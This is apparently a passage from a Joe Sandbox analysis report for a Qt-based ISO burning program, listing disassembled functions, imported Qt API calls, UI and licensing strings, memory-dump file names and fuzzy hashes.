                                                                                                                    • Part of subcall function 00007FF65371A000: ?isRunning@QThread@@QEBA_NXZ.QT5CORE(?,?,?,?,00000000,00007FF653719038), ref: 00007FF65371A030
                                                                                                                    • Part of subcall function 00007FF65371A000: Sleep.KERNEL32(?,?,?,?,00000000,00007FF653719038), ref: 00007FF65371A045
                                                                                                                    • Part of subcall function 00007FF65371A000: ?isRunning@QThread@@QEBA_NXZ.QT5CORE(?,?,?,?,00000000,00007FF653719038), ref: 00007FF65371A052
                                                                                                                    • Part of subcall function 00007FF65371A000: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE(?,?,?,?,00000000,00007FF653719038), ref: 00007FF65371A072
                                                                                                                    • Part of subcall function 00007FF65371A000: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE(?,?,?,?,00000000,00007FF653719038), ref: 00007FF65371A093
                                                                                                                    • Part of subcall function 00007FF65371A000: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,?,?,?,00000000,00007FF653719038), ref: 00007FF65371A0B2
                                                                                                                    • Part of subcall function 00007FF65371A000: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,?,?,?,00000000,00007FF653719038), ref: 00007FF65371A0C5
                                                                                                                    • Part of subcall function 00007FF65371A000: ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,00000000,00007FF653719038), ref: 00007FF65371A0E3
                                                                                                                    • Part of subcall function 00007FF65371A000: ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,00000000,00007FF653719038), ref: 00007FF65371A0EF
                                                                                                                    • Part of subcall function 00007FF65371A000: ?show@QWidget@@QEAAXXZ.QT5WIDGETS(?,?,?,?,00000000,00007FF653719038), ref: 00007FF65371A10A
                                                                                                                    • Part of subcall function 00007FF65371A000: ?start@QThread@@QEAAXW4Priority@1@@Z.QT5CORE(?,?,?,?,00000000,00007FF653719038), ref: 00007FF65371A126
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$Widget@@$?set$?fromArrayAscii_helper@Data@Enabled@Typed$Tree$Thread@@$Char@@@DateMessageRunning@StandardWidget$Array@@ByteItem@@Time@@V0@@$?arg@Box@@Box@@@@Button@Button@1@Char@@Flags@Latin1SleepString@@1String@@@Text@W421@@$?critical@?current?information@?show@?start@?stop@AbstractButton@@CurrentIcon@Icon@@@Item@Item@@@Priority@1@@String@Time@Timer@@V2@@
                                                                                                                  • String ID: Burning successfully completed$Close$Congratulation$Error
                                                                                                                  • API String ID: 857657314-532394365
                                                                                                                  • Opcode ID: 26e4c2e05338b158ed2c3eb57280baf8f6a67be276eb7f1a0d6c7006fd368657
                                                                                                                  • Instruction ID: deef785fd0a564228eaf0b04a0d5f924f4121fddb234cb1941b74d258d370598
                                                                                                                  • Opcode Fuzzy Hash: 26e4c2e05338b158ed2c3eb57280baf8f6a67be276eb7f1a0d6c7006fd368657
                                                                                                                  • Instruction Fuzzy Hash: 6D813F36E28A8282E700CF21E8963B96762FB85F99F480031DA4EB7764DF7DD449C754
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$Char@@@$?fromArrayAscii_helper@Data@TypedWidget@@$?arg@Char@@Latin1V1@_$?close@MessageRunning@StandardThread@@$?critical@?currentArray@@Box@@Box@@@@Button@Button@1@ByteFlags@Index@SleepString@@1V0@@W421@@
                                                                                                                  • String ID: Error$Extracted: %1 file(s)$Extracting: %1 error(s)$Extracting: Skipped %1 file(s)
                                                                                                                  • API String ID: 1917935649-3581166900
                                                                                                                  • Opcode ID: a1eba5d886e4417ed88a4cae52c75dd75f6cb02ccb4c0c5a9a295872ef215bff
                                                                                                                  • Instruction ID: de5c0882775d47ae08271a3fd73a36edc686089093ad373910641a5f26235e32
                                                                                                                  • Opcode Fuzzy Hash: a1eba5d886e4417ed88a4cae52c75dd75f6cb02ccb4c0c5a9a295872ef215bff
                                                                                                                  • Instruction Fuzzy Hash: 09715226D24A828AF710DF60EC8A3A82762FB45F59F490135E94EB7B64DF3CD448C355
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$Char@@@$?arg@?setChar@@Latin1$?fromArrayAscii_helper@ByteData@String@@@TypedWidget@@$Array@@Enabled@Label@@Settings@@Text@$?hide@?read?remove@?tr@All@Array@@@Device@@MetaObject@@
                                                                                                                  • String ID: %1 version of <i>%2</i>%3 has been registered successfully!$&trade;$Registration error: %1
                                                                                                                  • API String ID: 1728677401-1477218742
                                                                                                                  • Opcode ID: 86de596338b5cf57283746ffae611571e4d5062b231501b9f62f1ae5731648e3
                                                                                                                  • Instruction ID: 61f7373c5558fe6577d69f60a7399ee5015dbfd7a62a0db2efbfee786bd1c24d
                                                                                                                  • Opcode Fuzzy Hash: 86de596338b5cf57283746ffae611571e4d5062b231501b9f62f1ae5731648e3
                                                                                                                  • Instruction Fuzzy Hash: 6E512322E24A02E6F710DF61D8964AC2332FB89F597451131DA1FB7A74DF2CD559C344
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$Text$File$File@@Stream@@$?fromArrayAscii_helper@Char@@@Data@Document@@Flags@PlainString@@@Typed$?arg@?close@?document@?get?index?open@?tr@CaseChar@@Device@@Device@@@Device@@@@@Dialog@@Dialog@@@@@Edit@@Flag@Latin1MetaModeName@Object@@OpenOption@Qt@@@SaveSensitivity@Text@V2@11Widget@@
                                                                                                                  • String ID: .licenseRequested$.licenseRequested$.licenseRequested$License Request Files (*%1);;All Files (*.*)$Save License Request File
                                                                                                                  • API String ID: 3100221759-1463292496
                                                                                                                  • Opcode ID: ecf45a03794129fe62a8911aa76198738280702513bab3cb030952a6ceec6d12
                                                                                                                  • Instruction ID: a7a1125493b8963fb42f0553d7063655cf591560584ae2fb357d0670614ba368
                                                                                                                  • Opcode Fuzzy Hash: ecf45a03794129fe62a8911aa76198738280702513bab3cb030952a6ceec6d12
                                                                                                                  • Instruction Fuzzy Hash: BD512E32E24A12AAFB10DF70E8956E82332FB45B59F491131E51EB6AB4DF3CD549C348
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$?fromArrayAscii_helper@Data@Typed$Settings@@Variant@@$Array@@ByteV0@@$?setDate@@String@@@Value@Variant@@@$?current?remove@Date@String@V0@$$V2@@
                                                                                                                  • String ID: ForceRegister$Lisense$Registered$Registered$dd-MMM-yyyy
                                                                                                                  • API String ID: 3285803835-2541409
                                                                                                                  • Opcode ID: 59d056fddc879b07db68ed792e7eb9182897658cf6c99f2f0721e520e33922a4
                                                                                                                  • Instruction ID: 071f0c79d2ee49f546dea479831c1ea428cebcc1e5a57b666e1187ca79106289
                                                                                                                  • Opcode Fuzzy Hash: 59d056fddc879b07db68ed792e7eb9182897658cf6c99f2f0721e520e33922a4
                                                                                                                  • Instruction Fuzzy Hash: E751EC22E24A42AAFB11DF70DC561E83772FB55B49F890131E54EB26A4EF3CD549C388
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$?setByteString@@@Text@$?fromArrayArray@@Ascii_helper@Char@@@Data@PlainTyped$Edit@@$?arg@Char@@Label@@Latin1TextV0@@$?append@?index?mid@?read?tr@All@Array@@@CaseDevice@@LineMetaObject@@Qt@@@Sensitivity@V0@$$V1@@
                                                                                                                  • String ID: <b>%1</b>: $<font color=red>%1</font>$Error
                                                                                                                  • API String ID: 3450771243-1899453835
                                                                                                                  • Opcode ID: ce1c407f888129db3737e94144bae02ffb382720bbf66568a7e894ac8b7b33eb
                                                                                                                  • Instruction ID: 041f9b156e66e1e0608c8953347a2d9fe24cdc7498ab558bfe3912bb20edacb9
                                                                                                                  • Opcode Fuzzy Hash: ce1c407f888129db3737e94144bae02ffb382720bbf66568a7e894ac8b7b33eb
                                                                                                                  • Instruction Fuzzy Hash: 41615222E24941DAEB00DF71D8961EC2372FB89F99F495131EA1EB3AA4DF2CD549C344
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$?text@$Char@@@$?fromArrayAscii_helper@Data@Edit@@LineTyped$?arg@Char@@Item@@Latin1LongLong@MessageStandardTreeUpper@Widget$??8@?critical@Box@@Box@@@@Button@Button@1@Flags@String@@0@String@@1W421@@Widget@@
                                                                                                                  • String ID: Cannot %2 %1:A item with the name you specified already exists.Specify a different name.$Error$create$rename
                                                                                                                  • API String ID: 3329133085-606171457
                                                                                                                  • Opcode ID: d0e1305abfb1f75b7e3a777c5f438970a91562a4b96e01d934f6068743a366a2
                                                                                                                  • Instruction ID: bb970deb8e8ed7c71b052f11c4fbfb95acb9e3c9d23ed644f785b0055b82800c
                                                                                                                  • Opcode Fuzzy Hash: d0e1305abfb1f75b7e3a777c5f438970a91562a4b96e01d934f6068743a366a2
                                                                                                                  • Instruction Fuzzy Hash: 60618032A14A419AE710DF65E8812ED3362FB48F99F495231DA5EB3AA4DF3CE548C344
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$Array@@ByteV0@$$V0@@$?from?index?mid@?tr@ArrayAscii_helper@CaseData@Object@@Qt@@@Sensitivity@Typed
                                                                                                                  • String ID: Error:$No activation request found$No activation response supplied
                                                                                                                  • API String ID: 3373268654-1702880115
                                                                                                                  • Opcode ID: 7ea54f9aae5b743b375a91cf727a1f42802fc59eaaa04d3eb9e1c776cc765faa
                                                                                                                  • Instruction ID: 5d5c43c6bbb0ebe2df0c2bdfc460cf7fda0a64f66650ff515f4af09b03c578ee
                                                                                                                  • Opcode Fuzzy Hash: 7ea54f9aae5b743b375a91cf727a1f42802fc59eaaa04d3eb9e1c776cc765faa
                                                                                                                  • Instruction Fuzzy Hash: 9E917E22E2850296FB019F60D8522BD2762EF44F64F884135DA5EF76E5EF2CE549C388
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Painter@@$?setBrush@@$Color@$BrushGlobalPen@@Widget@@$Brush@Brush@@@Qt@@Style@2@@$?height@?width@Color@@Color@@@Qt@@@Render$?draw?rotate@?scale@?translate@Device@@@Ellipse@F@@@Hint@Hint@1@_PaintPen@Pen@@@PointRgb@Style@Width@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 469817008-0
                                                                                                                  • Opcode ID: 8e2caaaec05b9fc0069673bc57e323506af512d5ccb98e82337b5d76b2fb1999
                                                                                                                  • Instruction ID: 1c3bbfaff622a97245d1edcc82694f51cc4af6a14d5eff1158fc1527ec3e3a04
                                                                                                                  • Opcode Fuzzy Hash: 8e2caaaec05b9fc0069673bc57e323506af512d5ccb98e82337b5d76b2fb1999
                                                                                                                  • Instruction Fuzzy Hash: C1714B32F24A12EAFB00CBB4D8555AC3372FB95B49F444131CA0EB6968DF38E54AC744
                                                                                                                  APIs
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF6537446BC
                                                                                                                    • Part of subcall function 00007FF653746CB0: ??0QSettings@@QEAA@AEBVQString@@W4Format@0@PEAVQObject@@@Z.QT5CORE ref: 00007FF653746CE1
                                                                                                                    • Part of subcall function 00007FF653746CB0: ?setIniCodec@QSettings@@QEAAXPEBD@Z.QT5CORE ref: 00007FF653746CFC
                                                                                                                    • Part of subcall function 00007FF653746CB0: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653746D17
                                                                                                                    • Part of subcall function 00007FF653746CB0: ?beginGroup@QSettings@@QEAAXAEBVQString@@@Z.QT5CORE ref: 00007FF653746D2A
                                                                                                                    • Part of subcall function 00007FF653746CB0: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653746D36
                                                                                                                    • Part of subcall function 00007FF653746CB0: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653746D4E
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF6537446E0
                                                                                                                    • Part of subcall function 00007FF653746B00: ??0QDate@@QEAA@XZ.QT5CORE ref: 00007FF653746B27
                                                                                                                    • Part of subcall function 00007FF653746B00: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653746B66
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653744700
                                                                                                                  • ?currentDate@QDate@@SA?AV1@XZ.QT5CORE ref: 00007FF65374472B
                                                                                                                    • Part of subcall function 00007FF653743EE0: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653743F07
                                                                                                                    • Part of subcall function 00007FF653743EE0: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653743F2E
                                                                                                                    • Part of subcall function 00007FF653743EE0: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653743F51
                                                                                                                    • Part of subcall function 00007FF653743EE0: ??1QSettings@@UEAA@XZ.QT5CORE ref: 00007FF653743F5D
                                                                                                                  • ?toLatin1@QString@@QEGBA?AVQByteArray@@XZ.QT5CORE ref: 00007FF65374476B
                                                                                                                  • ?data@QByteArray@@QEAAPEADXZ.QT5CORE ref: 00007FF653744775
                                                                                                                  • ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FF653744793
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653744938
                                                                                                                  • ??1QSettings@@UEAA@XZ.QT5CORE ref: 00007FF653744946
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$?fromArrayAscii_helper@Data@Settings@@Typed$Array@@Byte$Date@@$?begin?current?data@?setCodec@Date@Format@0@Group@Latin1@Object@@@String@@@
                                                                                                                  • String ID: Activated
                                                                                                                  • API String ID: 2542922553-3002954046
                                                                                                                  • Opcode ID: 0f4bb312af224382d713fd38dcefa7ebe2c4487d04e673446328a267d8d6b9f1
                                                                                                                  • Instruction ID: 42bfd9738d28918ecfd6973c4b47ad39a756ff9e9f7abb4740179e450bb12fb4
                                                                                                                  • Opcode Fuzzy Hash: 0f4bb312af224382d713fd38dcefa7ebe2c4487d04e673446328a267d8d6b9f1
                                                                                                                  • Instruction Fuzzy Hash: 27816D22E2994299FB00DBB0D8521FC2362FF55F58B490135E94EF76E5EE28E849D348
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$?fromArrayAscii_helper@Data@Typed$Settings@@Variant@@$?setDate@@Value@Variant@@@$?currentArray@@ByteDate@String@String@@@V0@@V2@@
                                                                                                                  • String ID: Demo$DemoRegistered$Registered$dd-MMM-yyyy
                                                                                                                  • API String ID: 848461530-2986252721
                                                                                                                  • Opcode ID: 4a59b94268208543672e0cdc86ae879f289ea9d61f4d16c083944e5ad2e6d9d0
                                                                                                                  • Instruction ID: d194fe7d2426a7b4c5ff3dbfb0836e56307bcc6d33c507ca20ad6db3306c81fc
                                                                                                                  • Opcode Fuzzy Hash: 4a59b94268208543672e0cdc86ae879f289ea9d61f4d16c083944e5ad2e6d9d0
                                                                                                                  • Instruction Fuzzy Hash: CA411D22E249429AEB10DF70DC562E82332FB55B49F895131D54EB3AA4DF3CD958C388
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
